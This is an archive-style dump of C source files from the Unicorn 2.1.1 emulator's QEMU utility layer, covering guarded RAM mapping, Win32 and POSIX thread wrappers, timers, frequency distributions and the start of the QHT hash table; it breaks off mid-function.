QEMU_VMALLOC_ALIGN; #endif #endif return uc->qemu_real_host_page_size; } #endif #ifndef __MINGW32__ static void *qemu_ram_mmap(struct uc_struct *uc, size_t size, size_t align, bool shared) { int flags; int map_sync_flags = 0; int guardfd; size_t offset; size_t pagesize; size_t total; void *guardptr; void *ptr; /* * Note: this always allocates at least one extra page of virtual address * space, even if size is already aligned. */ total = size + align; #if defined(__powerpc64__) && defined(__linux__) /* On ppc64 mappings in the same segment (aka slice) must share the same * page size. Since we will be re-allocating part of this segment * from the supplied fd, we should make sure to use the same page size, to * this end we mmap the supplied fd. In this case, set MAP_NORESERVE to * avoid allocating backing store memory. * We do this unless we are using the system page size, in which case * anonymous memory is OK. */ flags = MAP_PRIVATE; pagesize = qemu_fd_getpagesize(uc); if (pagesize == uc->qemu_real_host_page_size) { guardfd = -1; flags |= MAP_ANONYMOUS; } else { guardfd = -1; flags |= MAP_NORESERVE; } #else guardfd = -1; pagesize = uc->qemu_real_host_page_size; flags = MAP_PRIVATE | MAP_ANONYMOUS; #endif guardptr = mmap(0, total, PROT_NONE, flags, guardfd, 0); if (guardptr == MAP_FAILED) { return MAP_FAILED; } assert(is_power_of_2(align)); /* Always align to host page size */ assert(align >= pagesize); flags = MAP_FIXED; flags |= MAP_ANONYMOUS; flags |= shared ? MAP_SHARED : MAP_PRIVATE; offset = QEMU_ALIGN_UP((uintptr_t)guardptr, align) - (uintptr_t)guardptr; ptr = mmap(guardptr + offset, size, PROT_READ | PROT_WRITE, flags | map_sync_flags, -1, 0); if (ptr == MAP_FAILED && map_sync_flags) { /* * if map failed with MAP_SHARED_VALIDATE | MAP_SYNC, * we will remove these flags to handle compatibility. */ ptr = mmap(guardptr + offset, size, PROT_READ | PROT_WRITE, flags, -1, 0); } if (ptr == MAP_FAILED) { munmap(guardptr, total); return MAP_FAILED; } if (offset > 0) { munmap(guardptr, offset); } /* * Leave a single PROT_NONE page allocated after the RAM block, to serve as * a guard page guarding against potential buffer overflows. */ total -= offset; if (total > size + pagesize) { munmap(ptr + size + pagesize, total - size - pagesize); } return ptr; } static void qemu_ram_munmap(struct uc_struct *uc, void *ptr, size_t size) { size_t pagesize; if (ptr) { /* Unmap both the RAM block and the guard page */ #if defined(__powerpc64__) && defined(__linux__) pagesize = qemu_fd_getpagesize(uc); #else pagesize = uc->qemu_real_host_page_size; #endif munmap(ptr, size + pagesize); } } #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/oslib-win32.c���������������������������������������������������������������0000664�0000000�0000000�00000005736�14675241067�0017357�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * os-win32.c * * Copyright (c) 2003-2008 Fabrice Bellard * Copyright (c) 2010-2016 Red Hat, Inc. * * QEMU library functions for win32 which are shared between QEMU and * the QEMU tools. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * The implementation of g_poll (functions poll_rest, g_poll) at the end of * this file are based on code from GNOME glib-2 and use a different license, * see the license comment there. */ #include <uc_priv.h> #include "qemu/osdep.h" #include <windows.h> #include "qemu-common.h" #include "sysemu/sysemu.h" void *qemu_oom_check(void *ptr) { if (ptr == NULL) { fprintf(stderr, "Failed to allocate memory: %lu\n", GetLastError()); abort(); } return ptr; } void *qemu_try_memalign(size_t alignment, size_t size) { void *ptr; if (!size) { abort(); } ptr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE); //trace_qemu_memalign(alignment, size, ptr); return ptr; } void *qemu_memalign(size_t alignment, size_t size) { return qemu_oom_check(qemu_try_memalign(alignment, size)); } static int get_allocation_granularity(void) { SYSTEM_INFO system_info; GetSystemInfo(&system_info); return system_info.dwAllocationGranularity; } void *qemu_anon_ram_alloc(struct uc_struct *uc, size_t size, uint64_t *align) { void *ptr; ptr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE); // trace_qemu_anon_ram_alloc(size, ptr); if (ptr && align) { *align = MAX(get_allocation_granularity(), getpagesize()); } return ptr; } void qemu_vfree(void *ptr) { //trace_qemu_vfree(ptr); if (ptr) { VirtualFree(ptr, 0, MEM_RELEASE); } } void qemu_anon_ram_free(struct uc_struct *uc, void *ptr, size_t size) { //trace_qemu_anon_ram_free(ptr, size); if (ptr) { VirtualFree(ptr, 0, MEM_RELEASE); } } int getpagesize(void) { SYSTEM_INFO system_info; GetSystemInfo(&system_info); return system_info.dwPageSize; } ����������������������������������unicorn-2.1.1/qemu/util/pagesize.c������������������������������������������������������������������0000664�0000000�0000000�00000000555�14675241067�0017110�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * pagesize.c - query the host about its page size * * Copyright (C) 2017, Emilio G. Cota <cota@braap.org> * License: GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include <uc_priv.h> void init_real_host_page_size(struct uc_struct *uc) { uc->qemu_real_host_page_size = getpagesize(); } ���������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qdist.c���������������������������������������������������������������������0000664�0000000�0000000�00000011627�14675241067�0016427�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * qdist.c - QEMU helpers for handling frequency distributions of data. * * Copyright (C) 2016, Emilio G. Cota <cota@braap.org> * * License: GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "qemu/qdist.h" #include <math.h> #ifndef NAN #define NAN (0.0 / 0.0) #endif #define QDIST_EMPTY_STR "(empty)" void qdist_init(struct qdist *dist) { dist->entries = g_new(struct qdist_entry, 1); dist->size = 1; dist->n = 0; } void qdist_destroy(struct qdist *dist) { g_free(dist->entries); } static inline int qdist_cmp_double(double a, double b) { if (a > b) { return 1; } else if (a < b) { return -1; } return 0; } static int qdist_cmp(const void *ap, const void *bp) { const struct qdist_entry *a = ap; const struct qdist_entry *b = bp; return qdist_cmp_double(a->x, b->x); } void qdist_add(struct qdist *dist, double x, long count) { struct qdist_entry *entry = NULL; if (dist->n) { struct qdist_entry e; e.x = x; entry = bsearch(&e, dist->entries, dist->n, sizeof(e), qdist_cmp); } if (entry) { entry->count += count; return; } if (unlikely(dist->n == dist->size)) { dist->size *= 2; dist->entries = g_renew(struct qdist_entry, dist->entries, dist->size); } dist->n++; entry = &dist->entries[dist->n - 1]; entry->x = x; entry->count = count; qsort(dist->entries, dist->n, sizeof(*entry), qdist_cmp); } void qdist_inc(struct qdist *dist, double x) { qdist_add(dist, x, 1); } /* * Bin the distribution in @from into @n bins of consecutive, non-overlapping * intervals, copying the result to @to. * * This function is internal to qdist: only this file and test code should * ever call it. * * Note: calling this function on an already-binned qdist is a bug. * * If @n == 0 or @from->n == 1, use @from->n. */ void qdist_bin__internal(struct qdist *to, const struct qdist *from, size_t n) { double xmin, xmax; double step; size_t i, j; qdist_init(to); if (from->n == 0) { return; } if (n == 0 || from->n == 1) { n = from->n; } /* set equally-sized bins between @from's left and right */ xmin = qdist_xmin(from); xmax = qdist_xmax(from); step = (xmax - xmin) / n; if (n == from->n) { /* if @from's entries are equally spaced, no need to re-bin */ for (i = 0; i < from->n; i++) { if (from->entries[i].x != xmin + i * step) { goto rebin; } } /* they're equally spaced, so copy the dist and bail out */ to->entries = g_renew(struct qdist_entry, to->entries, n); to->n = from->n; memcpy(to->entries, from->entries, sizeof(*to->entries) * to->n); return; } rebin: j = 0; for (i = 0; i < n; i++) { double x; double left, right; left = xmin + i * step; right = xmin + (i + 1) * step; /* Add x, even if it might not get any counts later */ x = left; qdist_add(to, x, 0); /* * To avoid double-counting we capture [left, right) ranges, except for * the righmost bin, which captures a [left, right] range. */ while (j < from->n && (from->entries[j].x < right || i == n - 1)) { struct qdist_entry *o = &from->entries[j]; qdist_add(to, x, o->count); j++; } } } static inline double qdist_x(const struct qdist *dist, int index) { if (dist->n == 0) { return NAN; } return dist->entries[index].x; } double qdist_xmin(const struct qdist *dist) { return qdist_x(dist, 0); } double qdist_xmax(const struct qdist *dist) { return qdist_x(dist, dist->n - 1); } size_t qdist_unique_entries(const struct qdist *dist) { return dist->n; } unsigned long qdist_sample_count(const struct qdist *dist) { unsigned long count = 0; size_t i; for (i = 0; i < dist->n; i++) { struct qdist_entry *e = &dist->entries[i]; count += e->count; } return count; } static double qdist_pairwise_avg(const struct qdist *dist, size_t index, size_t n, unsigned long count) { /* amortize the recursion by using a base case > 2 */ if (n <= 8) { size_t i; double ret = 0; for (i = 0; i < n; i++) { struct qdist_entry *e = &dist->entries[index + i]; ret += e->x * e->count / count; } return ret; } else { size_t n2 = n / 2; return qdist_pairwise_avg(dist, index, n2, count) + qdist_pairwise_avg(dist, index + n2, n - n2, count); } } double qdist_avg(const struct qdist *dist) { unsigned long count; count = qdist_sample_count(dist); if (!count) { return NAN; } return qdist_pairwise_avg(dist, 0, dist->n, count); } ���������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qemu-thread-posix.c���������������������������������������������������������0000664�0000000�0000000�00000003312�14675241067�0020647�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Wrappers around mutex/cond/thread functions * * Copyright Red Hat, Inc. 2009 * * Author: * Marcelo Tosatti <mtosatti@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * */ #include <stdlib.h> #include <stdio.h> #include <signal.h> #include <string.h> #include "qemu/thread.h" static void error_exit(int err, const char *msg) { fprintf(stderr, "qemu: %s: %s\n", msg, strerror(err)); abort(); } int qemu_thread_create(struct uc_struct *uc, QemuThread *thread, const char *name, void *(*start_routine)(void*), void *arg, int mode) { #ifndef __MINGW32__ sigset_t set, oldset; #endif int err; pthread_attr_t attr; err = pthread_attr_init(&attr); if (err) { error_exit(err, __func__); return -1; } if (mode == QEMU_THREAD_DETACHED) { err = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED); if (err) { error_exit(err, __func__); return -1; } } #ifndef __MINGW32__ sigfillset(&set); #endif pthread_sigmask(SIG_SETMASK, &set, &oldset); err = pthread_create(&thread->thread, &attr, start_routine, arg); if (err) { error_exit(err, __func__); return -1; } pthread_sigmask(SIG_SETMASK, &oldset, NULL); pthread_attr_destroy(&attr); return 0; } void qemu_thread_exit(struct uc_struct *uc, void *retval) { pthread_exit(retval); } void *qemu_thread_join(QemuThread *thread) { int err; void *ret; err = pthread_join(thread->thread, &ret); if (err) { error_exit(err, __func__); } return ret; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qemu-thread-win32.c���������������������������������������������������������0000664�0000000�0000000�00000007633�14675241067�0020461�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Win32 implementation for mutex/cond/thread functions * * Copyright Red Hat, Inc. 2010 * * Author: * Paolo Bonzini <pbonzini@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * */ #include "qemu-common.h" #include "qemu/thread.h" #include <process.h> #include <assert.h> #include <limits.h> #include "uc_priv.h" static void error_exit(int err, const char *msg) { char *pstr; FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER, NULL, err, 0, (LPTSTR)&pstr, 2, NULL); fprintf(stderr, "qemu: %s: %s\n", msg, pstr); LocalFree(pstr); //abort(); } struct QemuThreadData { /* Passed to win32_start_routine. */ void *(*start_routine)(void *); void *arg; short mode; /* Only used for joinable threads. */ bool exited; void *ret; CRITICAL_SECTION cs; struct uc_struct *uc; }; static unsigned __stdcall win32_start_routine(void *arg) { QemuThreadData *data = (QemuThreadData *) arg; void *(*start_routine)(void *) = data->start_routine; void *thread_arg = data->arg; if (data->mode == QEMU_THREAD_DETACHED) { data->uc->qemu_thread_data = NULL; g_free(data); data = NULL; } qemu_thread_exit(data->uc, start_routine(thread_arg)); abort(); } void qemu_thread_exit(struct uc_struct *uc, void *arg) { QemuThreadData *data = uc->qemu_thread_data; if (data) { assert(data->mode != QEMU_THREAD_DETACHED); data->ret = arg; EnterCriticalSection(&data->cs); data->exited = true; LeaveCriticalSection(&data->cs); } _endthreadex(0); } void *qemu_thread_join(QemuThread *thread) { QemuThreadData *data; void *ret; HANDLE handle; data = thread->data; if (!data) { return NULL; } /* * Because multiple copies of the QemuThread can exist via * qemu_thread_get_self, we need to store a value that cannot * leak there. The simplest, non racy way is to store the TID, * discard the handle that _beginthreadex gives back, and * get another copy of the handle here. */ handle = qemu_thread_get_handle(thread); if (handle) { WaitForSingleObject(handle, INFINITE); CloseHandle(handle); } ret = data->ret; assert(data->mode != QEMU_THREAD_DETACHED); DeleteCriticalSection(&data->cs); data->uc->qemu_thread_data = NULL; g_free(data); data = NULL; return ret; } int qemu_thread_create(struct uc_struct *uc, QemuThread *thread, const char *name, void *(*start_routine)(void *), void *arg, int mode) { HANDLE hThread; struct QemuThreadData *data; data = g_malloc(sizeof *data); data->start_routine = start_routine; data->arg = arg; data->mode = mode; data->exited = false; data->uc = uc; uc->qemu_thread_data = data; if (data->mode != QEMU_THREAD_DETACHED) { InitializeCriticalSection(&data->cs); } hThread = (HANDLE) _beginthreadex(NULL, 0, win32_start_routine, data, 0, &thread->tid); if (!hThread) { error_exit(GetLastError(), __func__); return -1; } CloseHandle(hThread); thread->data = (mode == QEMU_THREAD_DETACHED) ? NULL : data; return 0; } HANDLE qemu_thread_get_handle(QemuThread *thread) { QemuThreadData *data; HANDLE handle; data = thread->data; if (!data) { return NULL; } assert(data->mode != QEMU_THREAD_DETACHED); EnterCriticalSection(&data->cs); if (!data->exited) { handle = OpenThread(SYNCHRONIZE | THREAD_SUSPEND_RESUME, FALSE, thread->tid); } else { handle = NULL; } LeaveCriticalSection(&data->cs); return handle; } �����������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qemu-timer-common.c���������������������������������������������������������0000664�0000000�0000000�00000003345�14675241067�0020654�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU System Emulator * * Copyright (c) 2003-2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "qemu/timer.h" /***********************************************************/ /* real time host monotonic timer */ #ifdef _WIN32 int64_t clock_freq; void init_get_clock(void) { LARGE_INTEGER freq; int ret = QueryPerformanceFrequency(&freq); if (ret == 0) { fprintf(stderr, "Could not calibrate ticks\n"); exit(1); } clock_freq = freq.QuadPart; } #else int use_rt_clock; void init_get_clock(void) { struct timespec ts; use_rt_clock = 0; if (clock_gettime(CLOCK_MONOTONIC, &ts) == 0) { use_rt_clock = 1; } } #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qemu-timer.c����������������������������������������������������������������0000664�0000000�0000000�00000002502�14675241067�0017360�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU System Emulator * * Copyright (c) 2003-2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "qemu/timer.h" #include "uc_priv.h" #include "sysemu/cpus.h" #include "qemu/queue.h" int64_t qemu_clock_get_ns(QEMUClockType type) { return get_clock(); } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qht.c�����������������������������������������������������������������������0000664�0000000�0000000�00000052214�14675241067�0016074�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * qht.c - QEMU Hash Table, designed to scale for read-mostly workloads. * * Copyright (C) 2016, Emilio G. Cota <cota@braap.org> * * License: GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * * Assumptions: * - NULL cannot be inserted/removed as a pointer value. * - Trying to insert an already-existing hash-pointer pair is OK. However, * it is not OK to insert into the same hash table different hash-pointer * pairs that have the same pointer value, but not the hashes. * - Lookups are performed under an RCU read-critical section; removals * must wait for a grace period to elapse before freeing removed objects. * * Features: * - Reads (i.e. lookups and iterators) can be concurrent with other reads. * Lookups that are concurrent with writes to the same bucket will retry * via a seqlock; iterators acquire all bucket locks and therefore can be * concurrent with lookups and are serialized wrt writers. * - Writes (i.e. insertions/removals) can be concurrent with writes to * different buckets; writes to the same bucket are serialized through a lock. * - Optional auto-resizing: the hash table resizes up if the load surpasses * a certain threshold. Resizing is done concurrently with readers; writes * are serialized with the resize operation. * * The key structure is the bucket, which is cacheline-sized. Buckets * contain a few hash values and pointers; the u32 hash values are stored in * full so that resizing is fast. Having this structure instead of directly * chaining items has two advantages: * - Failed lookups fail fast, and touch a minimum number of cache lines. * - Resizing the hash table with concurrent lookups is easy. * * There are two types of buckets: * 1. "head" buckets are the ones allocated in the array of buckets in qht_map. * 2. all "non-head" buckets (i.e. all others) are members of a chain that * starts from a head bucket. * Note that the seqlock and spinlock of a head bucket applies to all buckets * chained to it; these two fields are unused in non-head buckets. * * On removals, we move the last valid item in the chain to the position of the * just-removed entry. This makes lookups slightly faster, since the moment an * invalid entry is found, the (failed) lookup is over. * * Resizing is done by taking all bucket spinlocks (so that no other writers can * race with us) and then copying all entries into a new hash map. Then, the * ht->map pointer is set, and the old map is freed once no RCU readers can see * it anymore. * * Writers check for concurrent resizes by comparing ht->map before and after * acquiring their bucket lock. If they don't match, a resize has occured * while the bucket spinlock was being acquired. * * Related Work: * - Idea of cacheline-sized buckets with full hashes taken from: * David, Guerraoui & Trigonakis, "Asynchronized Concurrency: * The Secret to Scaling Concurrent Search Data Structures", ASPLOS'15. * - Why not RCU-based hash tables? They would allow us to get rid of the * seqlock, but resizing would take forever since RCU read critical * sections in QEMU take quite a long time. * More info on relativistic hash tables: * + Triplett, McKenney & Walpole, "Resizable, Scalable, Concurrent Hash * Tables via Relativistic Programming", USENIX ATC'11. * + Corbet, "Relativistic hash tables, part 1: Algorithms", @ lwn.net, 2014. * https://lwn.net/Articles/612021/ */ #include "qemu/osdep.h" #include "qemu/qht.h" #include "qemu/atomic.h" //#include "qemu/rcu.h" //#define QHT_DEBUG /* * We want to avoid false sharing of cache lines. Most systems have 64-byte * cache lines so we go with it for simplicity. * * Note that systems with smaller cache lines will be fine (the struct is * almost 64-bytes); systems with larger cache lines might suffer from * some false sharing. */ #define QHT_BUCKET_ALIGN 64 /* define these to keep sizeof(qht_bucket) within QHT_BUCKET_ALIGN */ #if HOST_LONG_BITS == 32 #define QHT_BUCKET_ENTRIES 6 #else /* 64-bit */ #define QHT_BUCKET_ENTRIES 4 #endif enum qht_iter_type { QHT_ITER_VOID, /* do nothing; use retvoid */ QHT_ITER_RM, /* remove element if retbool returns true */ }; struct qht_iter { union { qht_iter_func_t retvoid; qht_iter_bool_func_t retbool; } f; enum qht_iter_type type; }; /* * Note: reading partially-updated pointers in @pointers could lead to * segfaults. We thus access them with atomic_read/set; this guarantees * that the compiler makes all those accesses atomic. We also need the * volatile-like behavior in atomic_read, since otherwise the compiler * might refetch the pointer. * atomic_read's are of course not necessary when the bucket lock is held. * * If both ht->lock and b->lock are grabbed, ht->lock should always * be grabbed first. */ struct qht_bucket { uint32_t hashes[QHT_BUCKET_ENTRIES]; void *pointers[QHT_BUCKET_ENTRIES]; struct qht_bucket *next; } QEMU_ALIGNED(QHT_BUCKET_ALIGN); QEMU_BUILD_BUG_ON(sizeof(struct qht_bucket) > QHT_BUCKET_ALIGN); /** * struct qht_map - structure to track an array of buckets * @rcu: used by RCU. Keep it as the top field in the struct to help valgrind * find the whole struct. * @buckets: array of head buckets. It is constant once the map is created. * @n_buckets: number of head buckets. It is constant once the map is created. * @n_added_buckets: number of added (i.e. "non-head") buckets * @n_added_buckets_threshold: threshold to trigger an upward resize once the * number of added buckets surpasses it. * * Buckets are tracked in what we call a "map", i.e. this structure. */ struct qht_map { struct qht_bucket *buckets; size_t n_buckets; size_t n_added_buckets; size_t n_added_buckets_threshold; }; /* trigger a resize when n_added_buckets > n_buckets / div */ #define QHT_NR_ADDED_BUCKETS_THRESHOLD_DIV 8 static void qht_do_resize_reset(struct uc_struct *uc, struct qht *ht, struct qht_map *new, bool reset); static void qht_grow_maybe(struct uc_struct *uc, struct qht *ht); #define qht_debug_assert(X) do { (void)(X); } while (0) static inline size_t qht_elems_to_buckets(size_t n_elems) { return pow2ceil(n_elems / QHT_BUCKET_ENTRIES); } static inline void qht_head_init(struct qht_bucket *b) { memset(b, 0, sizeof(*b)); } static inline struct qht_bucket *qht_map_to_bucket(const struct qht_map *map, uint32_t hash) { return &map->buckets[hash & (map->n_buckets - 1)]; } /* * Grab all bucket locks, and set @pmap after making sure the map isn't stale. * * Pairs with qht_map_unlock_buckets(), hence the pass-by-reference. * * Note: callers cannot have ht->lock held. */ static inline void qht_map_lock_buckets__no_stale(struct qht *ht, struct qht_map **pmap) { struct qht_map *map; map = ht->map; *pmap = map; return; } /* * Get a head bucket and lock it, making sure its parent map is not stale. * @pmap is filled with a pointer to the bucket's parent map. */ static inline struct qht_bucket *qht_bucket_lock__no_stale(struct qht *ht, uint32_t hash, struct qht_map **pmap) { struct qht_bucket *b; struct qht_map *map; map = ht->map; b = qht_map_to_bucket(map, hash); *pmap = map; return b; } static inline bool qht_map_needs_resize(const struct qht_map *map) { return map->n_added_buckets > map->n_added_buckets_threshold; } static inline void qht_chain_destroy(const struct qht_bucket *head) { struct qht_bucket *curr = head->next; struct qht_bucket *prev; while (curr) { prev = curr; curr = curr->next; qemu_vfree(prev); } } /* pass only an orphan map */ static void qht_map_destroy(struct qht_map *map) { size_t i; for (i = 0; i < map->n_buckets; i++) { qht_chain_destroy(&map->buckets[i]); } qemu_vfree(map->buckets); g_free(map); } static struct qht_map *qht_map_create(size_t n_buckets) { struct qht_map *map; size_t i; map = g_malloc(sizeof(*map)); map->n_buckets = n_buckets; map->n_added_buckets = 0; map->n_added_buckets_threshold = n_buckets / QHT_NR_ADDED_BUCKETS_THRESHOLD_DIV; /* let tiny hash tables to at least add one non-head bucket */ if (unlikely(map->n_added_buckets_threshold == 0)) { map->n_added_buckets_threshold = 1; } map->buckets = qemu_memalign(QHT_BUCKET_ALIGN, sizeof(*map->buckets) * n_buckets); for (i = 0; i < n_buckets; i++) { qht_head_init(&map->buckets[i]); } return map; } void qht_init(struct qht *ht, qht_cmp_func_t cmp, size_t n_elems, unsigned int mode) { struct qht_map *map; size_t n_buckets = qht_elems_to_buckets(n_elems); g_assert(cmp); ht->cmp = cmp; ht->mode = mode; map = qht_map_create(n_buckets); ht->map = map; } /* call only when there are no readers/writers left */ void qht_destroy(struct qht *ht) { qht_map_destroy(ht->map); memset(ht, 0, sizeof(*ht)); } static void qht_bucket_reset__locked(struct qht_bucket *head) { struct qht_bucket *b = head; int i; do { for (i = 0; i < QHT_BUCKET_ENTRIES; i++) { if (b->pointers[i] == NULL) { goto done; } b->hashes[i] = 0; b->pointers[i] = NULL; } b = b->next; } while (b); done: return; } /* call with all bucket locks held */ static void qht_map_reset__all_locked(struct qht_map *map) { size_t i; for (i = 0; i < map->n_buckets; i++) { qht_bucket_reset__locked(&map->buckets[i]); } } void qht_reset(struct qht *ht) { struct qht_map *map; qht_map_lock_buckets__no_stale(ht, &map); qht_map_reset__all_locked(map); } static inline void qht_do_resize(struct uc_struct *uc, struct qht *ht, struct qht_map *new) { qht_do_resize_reset(uc, ht, new, false); } static inline void qht_do_resize_and_reset(struct uc_struct *uc, struct qht *ht, struct qht_map *new) { qht_do_resize_reset(uc, ht, new, true); } bool qht_reset_size(struct uc_struct *uc, struct qht *ht, size_t n_elems) { struct qht_map *new = NULL; struct qht_map *map; size_t n_buckets; n_buckets = qht_elems_to_buckets(n_elems); map = ht->map; if (n_buckets != map->n_buckets) { new = qht_map_create(n_buckets); } qht_do_resize_and_reset(uc, ht, new); return !!new; } static inline void *qht_do_lookup(struct uc_struct *uc, const struct qht_bucket *head, qht_lookup_func_t func, const void *userp, uint32_t hash) { const struct qht_bucket *b = head; int i; do { for (i = 0; i < QHT_BUCKET_ENTRIES; i++) { if (b->hashes[i] == hash) { void *p = b->pointers[i]; if (likely(p) && likely(func(uc, p, userp))) { return p; } } } b = b->next; } while (b); return NULL; } void *qht_lookup_custom(struct uc_struct *uc, const struct qht *ht, const void *userp, uint32_t hash, qht_lookup_func_t func) { const struct qht_bucket *b; const struct qht_map *map; void *ret; map = ht->map; b = qht_map_to_bucket(map, hash); ret = qht_do_lookup(uc, b, func, userp, hash); return ret; } void *qht_lookup(struct uc_struct *uc, const struct qht *ht, const void *userp, uint32_t hash) { return qht_lookup_custom(uc, ht, userp, hash, ht->cmp); } /* * call with head->lock held * @ht is const since it is only used for ht->cmp() */ static void *qht_insert__locked(struct uc_struct *uc, const struct qht *ht, struct qht_map *map, struct qht_bucket *head, void *p, uint32_t hash, bool *needs_resize) { struct qht_bucket *b = head; struct qht_bucket *prev = NULL; struct qht_bucket *new = NULL; int i; do { for (i = 0; i < QHT_BUCKET_ENTRIES; i++) { if (b->pointers[i]) { if (unlikely(b->hashes[i] == hash && ht->cmp(uc, b->pointers[i], p))) { return b->pointers[i]; } } else { goto found; } } prev = b; b = b->next; } while (b); b = qemu_memalign(QHT_BUCKET_ALIGN, sizeof(*b)); memset(b, 0, sizeof(*b)); new = b; i = 0; map->n_added_buckets++; if (unlikely(qht_map_needs_resize(map)) && needs_resize) { *needs_resize = true; } found: /* found an empty key: acquire the seqlock and write */ if (new) { prev->next = b; } b->hashes[i] = hash; b->pointers[i] = p; return NULL; } #ifdef _MSC_VER static void qht_grow_maybe(struct uc_struct *uc, struct qht *ht) #else static __attribute__((noinline)) void qht_grow_maybe(struct uc_struct *uc, struct qht *ht) #endif { struct qht_map *map; map = ht->map; /* another thread might have just performed the resize we were after */ if (qht_map_needs_resize(map)) { struct qht_map *new = qht_map_create(map->n_buckets * 2); qht_do_resize(uc, ht, new); } } bool qht_insert(struct uc_struct *uc, struct qht *ht, void *p, uint32_t hash, void **existing) { struct qht_bucket *b; struct qht_map *map; bool needs_resize = false; void *prev; /* NULL pointers are not supported */ qht_debug_assert(p); b = qht_bucket_lock__no_stale(ht, hash, &map); prev = qht_insert__locked(uc, ht, map, b, p, hash, &needs_resize); if (unlikely(needs_resize) && ht->mode & QHT_MODE_AUTO_RESIZE) { qht_grow_maybe(uc, ht); } if (likely(prev == NULL)) { return true; } if (existing) { *existing = prev; } return false; } static inline bool qht_entry_is_last(const struct qht_bucket 